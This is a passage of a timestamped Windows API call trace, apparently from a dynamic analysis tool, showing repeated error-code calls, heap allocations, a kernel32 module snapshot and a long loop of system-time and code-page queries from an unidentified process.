SetLastError (dwErrCode=0x0) [0080.547] GetLastError () returned 0x0 [0080.547] SetLastError (dwErrCode=0x0) [0080.547] GetLastError () returned 0x0 [0080.547] SetLastError (dwErrCode=0x0) [0080.547] GetLastError () returned 0x0 [0080.548] SetLastError (dwErrCode=0x0) [0080.548] GetLastError () returned 0x0 [0080.548] SetLastError (dwErrCode=0x0) [0080.548] GetLastError () returned 0x0 [0080.548] SetLastError (dwErrCode=0x0) [0080.548] GetLastError () returned 0x0 [0080.548] SetLastError (dwErrCode=0x0) [0080.548] GetLastError () returned 0x0 [0080.548] SetLastError (dwErrCode=0x0) [0080.548] GetLastError () returned 0x0 [0080.548] SetLastError (dwErrCode=0x0) [0080.548] GetLastError () returned 0x0 [0080.549] SetLastError (dwErrCode=0x0) [0080.549] GetLastError () returned 0x0 [0080.549] SetLastError (dwErrCode=0x0) [0080.549] GetLastError () returned 0x0 [0080.549] SetLastError (dwErrCode=0x0) [0080.549] GetLastError () returned 0x0 [0080.549] SetLastError (dwErrCode=0x0) [0080.549] GetLastError () returned 0x0 [0080.549] SetLastError (dwErrCode=0x0) [0080.549] GetLastError () returned 0x0 [0080.549] SetLastError (dwErrCode=0x0) [0080.549] GetLastError () returned 0x0 [0080.550] SetLastError (dwErrCode=0x0) [0080.550] GetLastError () returned 0x0 [0080.550] SetLastError (dwErrCode=0x0) [0080.550] GetLastError () returned 0x0 [0080.550] SetLastError (dwErrCode=0x0) [0080.550] GetLastError () returned 0x0 [0080.550] SetLastError (dwErrCode=0x0) [0080.550] GetLastError () returned 0x0 [0080.550] SetLastError (dwErrCode=0x0) [0080.551] GetLastError () returned 0x0 [0080.551] SetLastError (dwErrCode=0x0) [0080.551] GetLastError () returned 0x0 [0080.551] SetLastError (dwErrCode=0x0) [0080.551] GetLastError () returned 0x0 [0080.551] SetLastError (dwErrCode=0x0) [0080.551] GetLastError () returned 0x0 [0080.552] SetLastError (dwErrCode=0x0) [0080.552] GetLastError () returned 0x0 [0080.552] SetLastError (dwErrCode=0x0) [0080.552] GetLastError () returned 0x0 [0080.552] SetLastError (dwErrCode=0x0) [0080.552] GetLastError () returned 0x0 [0080.552] SetLastError (dwErrCode=0x0) [0080.552] GetLastError () returned 0x0 [0080.552] SetLastError (dwErrCode=0x0) [0080.553] GetLastError () returned 0x0 [0080.553] SetLastError (dwErrCode=0x0) [0080.553] GetLastError () returned 0x0 [0080.553] SetLastError (dwErrCode=0x0) [0080.553] GetLastError () returned 0x0 [0080.553] SetLastError (dwErrCode=0x0) [0080.553] GetLastError () returned 0x0 [0080.553] SetLastError (dwErrCode=0x0) [0080.553] GetLastError () returned 0x0 [0080.554] SetLastError (dwErrCode=0x0) [0080.554] GetLastError () returned 0x0 [0080.554] SetLastError (dwErrCode=0x0) [0080.554] GetLastError () returned 0x0 [0080.554] SetLastError (dwErrCode=0x0) [0080.554] GetLastError () returned 0x0 [0080.554] SetLastError (dwErrCode=0x0) [0080.554] GetLastError () returned 0x0 [0080.554] SetLastError (dwErrCode=0x0) [0080.554] GetLastError () returned 0x0 [0080.555] SetLastError (dwErrCode=0x0) [0080.555] GetLastError () returned 0x0 [0080.555] SetLastError (dwErrCode=0x0) [0080.555] GetLastError () returned 0x0 [0080.555] SetLastError (dwErrCode=0x0) [0080.555] GetLastError () returned 0x0 [0080.555] SetLastError (dwErrCode=0x0) [0080.555] GetLastError () returned 0x0 [0080.556] SetLastError (dwErrCode=0x0) [0080.556] GetLastError () returned 0x0 [0080.556] SetLastError (dwErrCode=0x0) [0080.556] GetLastError () returned 0x0 [0080.556] SetLastError (dwErrCode=0x0) [0080.556] GetLastError () returned 0x0 [0080.629] SetLastError (dwErrCode=0x0) [0080.629] GetLastError () returned 0x0 [0080.629] SetLastError (dwErrCode=0x0) [0080.629] GetLastError () returned 0x0 [0080.629] SetLastError (dwErrCode=0x0) [0080.629] GetLastError () returned 0x0 [0080.630] SetLastError (dwErrCode=0x0) [0080.630] GetLastError () returned 0x0 [0080.630] SetLastError (dwErrCode=0x0) [0080.630] GetLastError () returned 0x0 [0080.630] SetLastError (dwErrCode=0x0) [0080.630] GetLastError () returned 0x0 [0080.630] SetLastError (dwErrCode=0x0) [0080.630] GetLastError () returned 0x0 [0080.630] SetLastError (dwErrCode=0x0) [0080.630] GetLastError () returned 0x0 [0080.630] SetLastError (dwErrCode=0x0) [0080.630] GetLastError () returned 0x0 [0080.631] SetLastError (dwErrCode=0x0) [0080.631] GetLastError () returned 0x0 [0080.631] SetLastError (dwErrCode=0x0) [0080.631] GetLastError () returned 0x0 [0080.631] SetLastError (dwErrCode=0x0) [0080.631] GetLastError () returned 0x0 [0080.631] SetLastError (dwErrCode=0x0) [0080.631] GetLastError () returned 0x0 [0080.631] SetLastError (dwErrCode=0x0) [0080.631] GetLastError () returned 0x0 [0080.632] SetLastError (dwErrCode=0x0) [0080.632] GetLastError () returned 0x0 [0080.632] SetLastError (dwErrCode=0x0) [0080.632] GetLastError () returned 0x0 [0080.632] SetLastError (dwErrCode=0x0) [0080.632] GetLastError () returned 0x0 [0080.632] SetLastError (dwErrCode=0x0) [0080.632] GetLastError () returned 0x0 [0080.632] SetLastError (dwErrCode=0x0) [0080.632] GetLastError () returned 0x0 [0080.632] SetLastError (dwErrCode=0x0) [0080.633] GetLastError () returned 0x0 [0080.633] SetLastError (dwErrCode=0x0) [0080.633] GetLastError () returned 0x0 [0080.633] SetLastError (dwErrCode=0x0) [0080.633] GetLastError () returned 0x0 [0080.633] SetLastError (dwErrCode=0x0) [0080.633] GetLastError () returned 0x0 [0080.633] SetLastError (dwErrCode=0x0) [0080.633] GetLastError () returned 0x0 [0080.633] SetLastError (dwErrCode=0x0) [0080.634] GetLastError () returned 0x0 [0080.634] SetLastError (dwErrCode=0x0) [0080.634] GetLastError () returned 0x0 [0080.634] SetLastError (dwErrCode=0x0) [0080.634] GetLastError () returned 0x0 [0080.634] SetLastError (dwErrCode=0x0) [0080.634] GetLastError () returned 0x0 [0080.634] SetLastError (dwErrCode=0x0) [0080.634] GetLastError () returned 0x0 [0080.634] SetLastError (dwErrCode=0x0) [0080.634] GetLastError () returned 0x0 [0080.635] SetLastError (dwErrCode=0x0) [0080.635] GetLastError () returned 0x0 [0080.635] SetLastError (dwErrCode=0x0) [0080.635] GetLastError () returned 0x0 [0080.635] SetLastError (dwErrCode=0x0) [0080.635] GetLastError () returned 0x0 [0080.635] SetLastError (dwErrCode=0x0) [0080.635] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x98) returned 0x1fd1a00 [0080.635] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x1f) returned 0x1fd1aa0 [0080.635] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x36) returned 0x1fd1ac8 [0080.635] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x37) returned 0x1fd1b08 [0080.635] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x3c) returned 0x1fd1b48 [0080.635] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x31) returned 0x1fd1b90 [0080.635] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x17) returned 0x1fd1bd0 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x24) returned 0x1fd1bf0 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x14) returned 0x1fd1c20 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0xd) returned 0x1fd1c40 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x25) returned 0x1fd1c58 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x39) returned 0x1fd1c88 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x18) returned 0x1fd1cd0 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x17) returned 0x1fd1cf0 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0xe) returned 0x1fd1d10 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x69) returned 0x1fd1d28 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x3e) returned 0x1fd1da0 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x1b) returned 0x1fd1de8 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x1d) returned 0x1fd1e10 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x48) returned 0x1fd1e38 [0080.636] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x12) returned 0x1fd1e88 [0080.667] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x18) returned 0x1fd1ea8 [0080.667] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x1b) returned 0x1fd1ec8 [0080.667] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x24) returned 0x1fd1ef0 [0080.667] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x29) returned 0x1fd1f20 [0080.667] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x1e) returned 0x1fd1f58 [0080.667] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x41) returned 0x1fd1f80 [0080.667] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x17) returned 0x1fd1fd0 [0080.668] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0xf) returned 0x1fd1ff0 [0080.668] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x16) returned 0x1fd2008 [0080.668] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x2a) returned 0x1fd2028 [0080.668] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x29) returned 0x1fd2060 [0080.668] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x15) returned 0x1fd2098 [0080.668] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x1e) returned 0x1fd20b8 [0080.668] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x2a) returned 0x1fd20e0 [0080.668] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x12) returned 0x1fd2118 [0080.668] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x18) returned 0x1fd2138 [0080.668] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x46) returned 0x1fd2158 [0080.668] HeapFree (in: hHeap=0x1fd0000, dwFlags=0x0, lpMem=0x1fd11f8 | out: hHeap=0x1fd0000) returned 1 [0080.671] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x800) returned 0x1fd21a8 [0080.671] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x8, Size=0x80) returned 0x1fd11f8 [0080.672] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e69) returned 0x0 [0080.672] RtlSizeHeap (HeapHandle=0x1fd0000, Flags=0x0, MemoryPointer=0x1fd11f8) returned 0x80 [0080.673] GetLastError () returned 0x0 [0080.673] SetLastError (dwErrCode=0x0) [0080.673] GetLastError () returned 0x0 [0080.673] SetLastError (dwErrCode=0x0) [0080.673] GetLastError () returned 0x0 [0080.673] SetLastError (dwErrCode=0x0) [0080.673] GetLastError () returned 0x0 [0080.674] SetLastError (dwErrCode=0x0) [0080.674] GetLastError () returned 0x0 [0080.674] SetLastError (dwErrCode=0x0) [0080.674] GetLastError () returned 0x0 [0080.674] SetLastError (dwErrCode=0x0) [0080.674] GetLastError () returned 0x0 [0080.674] SetLastError (dwErrCode=0x0) [0080.674] GetLastError () returned 0x0 [0080.674] SetLastError (dwErrCode=0x0) [0080.674] GetLastError () returned 0x0 [0080.674] SetLastError (dwErrCode=0x0) [0080.674] GetLastError () returned 0x0 [0080.675] SetLastError (dwErrCode=0x0) [0080.675] GetLastError () returned 0x0 [0080.675] SetLastError (dwErrCode=0x0) [0080.675] GetLastError () returned 0x0 [0080.675] SetLastError (dwErrCode=0x0) [0080.675] GetLastError () returned 0x0 [0080.675] SetLastError (dwErrCode=0x0) [0080.675] GetLastError () returned 0x0 [0080.675] SetLastError (dwErrCode=0x0) [0080.675] GetLastError () returned 0x0 [0080.675] SetLastError (dwErrCode=0x0) [0080.675] GetLastError () returned 0x0 [0080.675] SetLastError (dwErrCode=0x0) [0080.675] GetLastError () returned 0x0 [0080.676] SetLastError (dwErrCode=0x0) [0080.676] GetLastError () returned 0x0 [0080.676] SetLastError (dwErrCode=0x0) [0080.676] GetLastError () returned 0x0 [0080.676] SetLastError (dwErrCode=0x0) [0080.676] GetLastError () returned 0x0 [0080.676] SetLastError (dwErrCode=0x0) [0080.676] GetLastError () returned 0x0 [0080.676] SetLastError (dwErrCode=0x0) [0080.676] GetLastError () returned 0x0 [0081.109] SetLastError (dwErrCode=0x0) [0081.109] GetLastError () returned 0x0 [0081.109] SetLastError (dwErrCode=0x0) [0081.109] GetLastError () returned 0x0 [0081.109] SetLastError (dwErrCode=0x0) [0081.109] GetLastError () returned 0x0 [0081.109] SetLastError (dwErrCode=0x0) [0081.109] GetLastError () returned 0x0 [0081.109] SetLastError (dwErrCode=0x0) [0081.109] GetLastError () returned 0x0 [0081.110] SetLastError (dwErrCode=0x0) [0081.110] GetLastError () returned 0x0 [0081.110] SetLastError (dwErrCode=0x0) [0081.110] GetLastError () returned 0x0 [0081.110] SetLastError (dwErrCode=0x0) [0081.110] GetLastError () returned 0x0 [0081.110] SetLastError (dwErrCode=0x0) [0081.111] GetLastError () returned 0x0 [0081.111] SetLastError (dwErrCode=0x0) [0081.111] GetLastError () returned 0x0 [0081.111] SetLastError (dwErrCode=0x0) [0081.111] GetLastError () returned 0x0 [0081.111] SetLastError (dwErrCode=0x0) [0081.111] GetLastError () returned 0x0 [0081.111] SetLastError (dwErrCode=0x0) [0081.111] GetLastError () returned 0x0 [0081.112] SetLastError (dwErrCode=0x0) [0081.112] GetLastError () returned 0x0 [0081.112] SetLastError (dwErrCode=0x0) [0081.112] GetLastError () returned 0x0 [0081.112] SetLastError (dwErrCode=0x0) [0081.112] GetLastError () returned 0x0 [0081.112] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0081.113] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0081.113] GetProcAddress (hModule=0x76e10000, lpProcName="Module32FirstW") returned 0x76e479f9 [0081.113] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0081.118] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0081.118] PeekMessageA (in: lpMsg=0x18fa38, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa38) returned 0 [0081.118] GetTickCount () returned 0x115a110 [0081.119] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.119] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.119] GetACP () returned 0x4e4 [0081.119] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.119] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.119] GetACP () returned 0x4e4 [0081.119] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.119] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.119] GetACP () returned 0x4e4 [0081.119] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.120] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.120] GetACP () returned 0x4e4 [0081.120] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.120] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.120] GetACP () returned 0x4e4 [0081.120] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.120] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.120] GetACP () returned 0x4e4 [0081.120] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.121] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.121] GetACP () returned 0x4e4 [0081.121] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.121] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.121] GetACP () returned 0x4e4 [0081.121] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.121] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.121] GetACP () returned 0x4e4 [0081.121] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.121] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.121] GetACP () returned 0x4e4 [0081.122] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.122] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.122] GetACP () returned 0x4e4 [0081.122] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.122] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.122] GetACP () returned 0x4e4 [0081.122] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.122] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.122] GetACP () returned 0x4e4 [0081.122] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.123] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.123] GetACP () returned 0x4e4 [0081.123] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.123] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.123] GetACP () returned 0x4e4 [0081.123] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.123] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.123] GetACP () returned 0x4e4 [0081.123] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.124] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.124] GetACP () returned 0x4e4 [0081.124] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.124] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.124] GetACP () returned 0x4e4 [0081.124] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.124] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.124] GetACP () returned 0x4e4 [0081.124] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.124] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.124] GetACP () returned 0x4e4 [0081.125] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.125] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.125] GetACP () returned 0x4e4 [0081.125] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.125] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.125] GetACP () returned 0x4e4 [0081.125] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.125] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.125] GetACP () returned 0x4e4 [0081.125] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.125] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.126] GetACP () returned 0x4e4 [0081.126] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.126] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.126] GetACP () returned 0x4e4 [0081.126] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.126] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.126] GetACP () returned 0x4e4 [0081.126] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.126] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.127] GetACP () returned 0x4e4 [0081.127] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.127] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.127] GetACP () returned 0x4e4 [0081.127] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.127] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.127] GetACP () returned 0x4e4 [0081.127] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.127] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.127] GetACP () returned 0x4e4 [0081.127] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.128] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.128] GetACP () returned 0x4e4 [0081.128] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.233] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.233] GetACP () returned 0x4e4 [0081.233] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.234] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.234] GetACP () returned 0x4e4 [0081.234] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.234] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.234] GetACP () returned 0x4e4 [0081.234] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.234] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.234] GetACP () returned 0x4e4 [0081.234] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.234] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: lpCPInfo=0x18fa7c) returned 1 [0081.234] GetACP () returned 0x4e4 [0081.234] GetSystemTimes (in: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54 | out: lpIdleTime=0x18fa90, lpKernelTime=0x18fa98, lpUserTime=0x18fa54) returned 1 [0081.234] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa7c | out: 